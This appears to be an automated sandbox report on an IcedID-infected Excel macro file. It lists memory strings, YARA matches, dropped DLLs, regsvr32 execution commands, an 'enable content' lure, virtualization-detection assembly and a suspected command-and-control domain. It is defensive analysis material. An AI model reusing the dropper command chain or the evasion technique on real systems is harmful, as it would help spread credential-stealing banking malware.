        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d3ctxlq1ktw2nl.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://d3h2ozso0dirfl.cloudfront.net
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gif
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://devices.amazonaws.com?hp=tile&amp;so-exp=below
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://dgen8gghn3u86.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://dk261l6wntthl.cloudfront.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://docs.aws.amazon.com/index.html?nc2=h_ql_doc
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://download.stormacq.com/aws/podcast/
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://dpm.demdex.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://dts.podtrac.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://i18n-string.us-west-2.prod.pricing.aws.a2z.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://img.youtube.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://marketingplatform.google.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://media.amazonwebservices.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://mktg-apac.s3-ap-southeast-1.amazonaws.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://p.adsymptotic.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/communication-preferences?trk=homepage
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=fico
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllw
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://phd.aws.amazon.com/?nc2=h_m_sc
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?exp=default&amp;sc_icampaign=
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=default
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://portal.aws.amazon.com/gp/aws/manageYourAccount?nc2=h_m_ma
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://press.aboutamazon.com/press-releases/aws
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submit
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://prod-us-west-2.csp-report.marketing.aws.dev/submitx-amz-id-1Z10NXV9YPC16ZYC023HEX-Content-Ty
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.html
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://s3.amazonaws.com/aws-quickstart/
        Source: regsvr32.exe, 00000003.00000003.2098044591.0000000000347000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://ssl-static.libsyn.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://static-cdn.jtvnw.net
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://static.doubleclick.net
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/awscloud
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://website.spot.ec2.aws.a2z.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://www.amazon.jobs/aws
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.buzzsprout.com;
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmpString found in binary or memory: https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.linkedin.com
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://www.twitch.tv/aws
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube-nocookie.com;
        Source: regsvr32.exe, 00000003.00000002.2103551459.0000000002A98000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/user/AmazonWebServices/Cloud/
        Source: regsvr32.exe, 00000003.00000003.2098015044.0000000002A7A000.00000004.00000001.sdmpString found in binary or memory: https://yt3.ggpht.com;
        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49174
        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49170
        Source: unknown; Network traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknown; Network traffic detected: HTTP traffic on port 49170 -> 443
        Source: unknown; Network traffic detected: HTTP traffic on port 49174 -> 443

        E-Banking Fraud:

        Yara detected IcedID
        Source: Yara match; File source: dump.pcap, type: PCAP
        Source: Yara match; File source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match; File source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match; File source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2808, type: MEMORY
        Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 2996, type: MEMORY
        Source: Yara match; File source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY

        System Summary:

        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
        Source: Document image extraction number: 0; Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 0; Screenshot OCR: Enable Content button from the yellow bar above
        Source: Document image extraction number: 1; Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
        Source: Document image extraction number: 1; Screenshot OCR: Enable Content button from the yellow bar above
        Office process drops PE file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
        Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_00221678 NtQuerySystemInformation
        Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_001B1678 NtQuerySystemInformation
        Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_00221810
        Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_000007FEF8FB15D0
        Source: C:\Windows\System32\regsvr32.exe; Code function: 3_2_000007FEF8FB41BF
        Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_001B1810
        Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_000007FEF8F915D0
        Source: C:\Windows\System32\regsvr32.exe; Code function: 4_2_000007FEF8F941BF
        Source: C:\Windows\System32\regsvr32.exe; Code function: 6_2_000007FEF77215D0
        Source: C:\Windows\System32\regsvr32.exe; Code function: 6_2_000007FEF77241BF
        Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml 2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
        Source: 6.2.regsvr32.exe.a0000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.110000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.220000.1.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 6.2.regsvr32.exe.a0000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 6.2.regsvr32.exe.1b0000.1.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 3.2.regsvr32.exe.110000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 4.2.regsvr32.exe.1b0000.1.unpack, type: UNPACKEDPE; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000003.00000002.2102276983.0000000000110000.00000004.00000001.sdmp, type: MEMORY; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000006.00000002.2118500619.00000000000A0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: 00000004.00000002.2109562092.0000000000190000.00000004.00000001.sdmp, type: MEMORY; Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
        Source: regsvr32.exe, 00000003.00000002.2105066388.00000000030F0000.00000002.00000001.sdmp; Binary or memory string: .VBPud<_
        Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSM@7/8@15/5
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$sbf0127365-7431059.xlsm
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVRDA38.tmp
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
        Source: C:\Windows\System32\regsvr32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Windows\System32\regsvr32.exe; File read: C:\Windows\System32\drivers\etc\hosts
        Source: unknown; Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
        Source: Window Recorder; Window detected: More than 3 window changes detected
        Source: sbf0127365-7431059.xlsm; Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
        Source: sbf0127365-7431059.xlsm; Initial sample: OLE zip file path = xl/media/image1.png
        Source: sbf0127365-7431059.xlsm; Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
        Source: sbf0127365-7431059.xlsm; Initial sample: OLE zip file path = xl/calcChain.xml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: lsdfik[1].fml.0.dr; Static PE information: real checksum: 0x1baf8 should be: 0x19d85
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml

        Boot Survival:

        Drops PE files to the user root directory
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\XTOWN.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\XRAY.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\XZIBIT.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Contains functionality to detect hardware virtualization (CPUID execution measurement)
        Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00221E50 3_2_00221E50
        Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_001B1E50 4_2_001B1E50
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Windows\System32\regsvr32.exe RDTSC instruction interceptor: First address: 0000000000221E71 second address: 0000000000221E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exe RDTSC instruction interceptor: First address: 0000000000221EAB second address: 0000000000221EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exe RDTSC instruction interceptor: First address: 00000000001B1E71 second address: 00000000001B1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
        Source: C:\Windows\System32\regsvr32.exe RDTSC instruction interceptor: First address: 00000000001B1EAB second address: 00000000001B1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_00222434 rdtsc 3_2_00222434
        Source: C:\Windows\System32\regsvr32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,3_2_002227BC
        Source: C:\Windows\System32\regsvr32.exe Code function: GetAdaptersInfo,GetAdaptersInfo,4_2_001B27BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2105755377.0000000003183000.00000004.00000001.sdmp Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmp Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmp Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmp Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmp Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000002.2117121208.0000000003140000.00000004.00000001.sdmp Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000003.2105877978.000000000314F000.00000004.00000001.sdmp Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-a
        Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion:

        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\regsvr32.exe Domain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exe Domain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exe Network Connect: 13.224.92.73 187
        Source: C:\Windows\System32\regsvr32.exe Network Connect: 172.67.213.115 80
        Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_002222DC LookupAccountNameW,3_2_002222DC

        Stealing of Sensitive Information:

        Yara detected IcedID
        Source: Yara match File source: dump.pcap, type: PCAP
        Source: Yara match File source: 00000004.00000002.2109666116.000000000034E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.2118665965.00000000002F7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2102390531.0000000000329000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000004.00000002.2109698014.0000000000377000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara match File source: 00000003.00000002.2102412669.0000000000347000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: 00000006.00000002.2120636157.0000000003090000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2808, type: MEMORY
        Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 2996, type: MEMORY
        Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 3068, type: MEMORY

        Remote Access Functionality:

        Yara detected IcedID
        Source: Yara match File source: dump.pcap, type: PCAP
